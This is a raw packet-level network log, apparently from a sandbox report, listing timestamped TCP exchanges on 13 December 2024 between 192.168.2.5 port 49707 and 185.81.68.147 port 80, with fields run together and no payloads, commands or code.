                                                                                                                                                                Dec 13, 2024 01:37:08.226386070 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.226469994 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.226489067 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.227278948 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.227359056 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.227402925 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.228194952 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.228266954 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.228296995 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.229110956 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.229183912 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.229248047 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.230006933 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.230086088 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.230127096 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.230925083 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.231002092 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.231041908 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.231853962 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.231931925 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.231936932 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.232743979 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.232821941 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.232856989 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.233628988 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.233707905 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.233757973 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.234556913 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.234633923 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.234667063 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.235459089 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.235532999 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.235575914 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.236387014 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.236468077 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.236484051 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.285912991 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.381438971 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.381578922 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.381711960 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.381810904 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.382000923 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.382119894 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.382714987 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.382833958 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.382944107 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.383635044 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.383758068 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.383865118 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.384563923 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.384598970 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.384704113 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.385468006 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.385588884 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.385701895 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.386359930 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.386441946 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.386563063 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.387264013 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.387387037 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.387494087 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.388180017 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.388264894 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.388379097 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.389101028 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.389205933 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.389312029 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.389998913 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.390145063 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.390259981 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.390944958 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.391060114 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.391165018 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.391841888 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.391940117 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.392049074 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.392714977 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.392827988 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.392940998 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.393642902 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.393755913 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.393863916 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.394539118 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.394651890 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.394761086 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.395461082 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.395590067 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.395710945 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.396369934 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.396471977 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.396585941 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.397267103 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.397413015 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.397526979 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.398196936 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.398308039 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.398418903 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.399087906 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.399271011 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.399384022 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.400029898 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.400160074 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.400418997 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.400950909 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.401004076 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.401128054 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.401829958 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.401966095 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.402075052 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.402720928 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.402843952 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.402951956 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.403666019 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.403779984 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.403883934 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.404562950 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.404616117 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.404720068 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.405469894 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.405590057 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.405689955 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.406374931 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.406505108 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.406608105 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.407269001 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.407370090 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.407474995 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.408233881 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.408365011 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.408469915 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.409102917 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.409229040 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.409336090 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.410018921 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.410128117 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.410243988 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.410928011 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.411041021 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.411149025 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.411828995 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.411961079 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.412080050 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.412739038 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.412853003 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.412965059 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.413650036 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.413779020 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.413891077 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.414568901 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.414690971 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.414800882 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.415469885 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.415576935 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.415684938 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.416426897 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.416512966 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.416630030 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.417296886 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.417475939 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.417582989 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.418214083 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.418294907 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.418405056 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.419110060 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.419231892 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.419337988 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.420028925 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.420128107 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.420233011 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.420934916 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.421051979 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.421161890 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.421833038 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.421979904 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.422087908 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.422745943 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.422867060 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.422975063 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.423655033 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.423784018 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.423894882 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.424576998 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.424679995 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.424791098 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.425476074 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.425590992 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.425707102 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.426388025 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.426510096 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.426625013 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.427295923 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.427612066 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.427722931 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.428247929 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.428380013 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.428486109 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.429073095 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.473412037 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.573374033 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.573470116 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.573729992 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.573779106 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.573918104 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.574033022 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.574661016 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.575004101 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.575069904 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.575100899 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.575941086 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.576001883 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.576040030 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.576803923 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.576884031 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.576925039 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.577732086 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.577811003 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.577857018 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.578629017 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.578706980 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.578730106 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.579536915 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.579613924 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.579736948 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.580449104 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.580527067 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.580557108 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.581370115 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.581449986 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.581489086 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.582278013 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.582359076 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.582398891 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.583175898 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.583256006 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.583292007 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.584084988 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.584186077 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.584207058 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.585001945 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.585081100 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.585119963 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.585901976 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.585994959 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.586021900 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.586823940 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.586910963 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.586932898 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.587707043 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.587790966 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.587836981 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.588620901 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.588710070 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.588763952 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.589560032 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.589643002 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.589732885 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.590471983 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.590545893 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.590574980 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.591386080 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.591459990 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.591495991 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.592278004 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.592365980 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.592385054 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.593213081 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.593296051 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.593337059 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.594130039 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.594230890 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.594250917 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.595033884 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.595113039 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.595134974 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.595936060 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.596009016 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.596045017 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.596829891 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.596903086 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.596987963 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.597742081 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.597815037 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.597843885 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.598726034 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.598787069 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.598809958 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.600264072 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.600280046 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.600337029 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.600502968 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.600570917 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.600583076 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.601391077 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.601449966 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.601466894 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.602283955 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.602360964 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.602399111 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.603224993 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.603287935 CET8049707185.81.68.147192.168.2.5
